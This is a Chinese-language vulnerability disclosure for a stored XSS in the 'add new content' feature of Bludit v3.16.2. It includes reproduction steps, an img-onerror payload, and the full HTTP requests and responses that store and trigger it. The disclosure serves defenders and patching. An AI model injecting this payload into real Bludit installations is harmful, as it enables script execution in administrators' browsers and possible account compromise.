Bludit v3.16.2 "添加新内容"功能存储型XSS漏洞分析

本文详细披露了Bludit v3.16.2内容管理系统在"添加新内容"功能中存在的存储型跨站脚本(XSS)漏洞,包含完整的复现步骤、HTTP请求/响应数据以及漏洞触发机制分析。

漏洞标题:存储型XSS “添加新内容"功能 - bluditv3.16.2

日期:2025年7月

漏洞作者:Andrey Stoykov

版本:3.16.2

测试环境:Debian 12

博客:https://msecureltd.blogspot.com/

存储型XSS “添加新内容"功能 #1:

复现步骤:

  1. 使用管理员账户登录并访问"新建内容”
  2. 在"源代码"字段中输入以下参数 <iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
  3. 点击"预览"时XSS载荷将触发

// HTTP POST请求添加新内容

POST /bludit/admin/new-content HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 […]

tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<img+src%3d”"+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss

// HTTP响应

HTTP/1.1 301 Moved Permanently Date: Wed, 04 Jun 2025 19:16:04 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: Bludit Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: /bludit/admin/content Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

// HTTP GET请求触发XSS

GET /bludit/admin/edit-content/xss HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 […]

// HTTP响应

HTTP/1.0 200 OK Date: Wed, 04 Jun 2025 19:16:06 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: Bludit Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8

[…]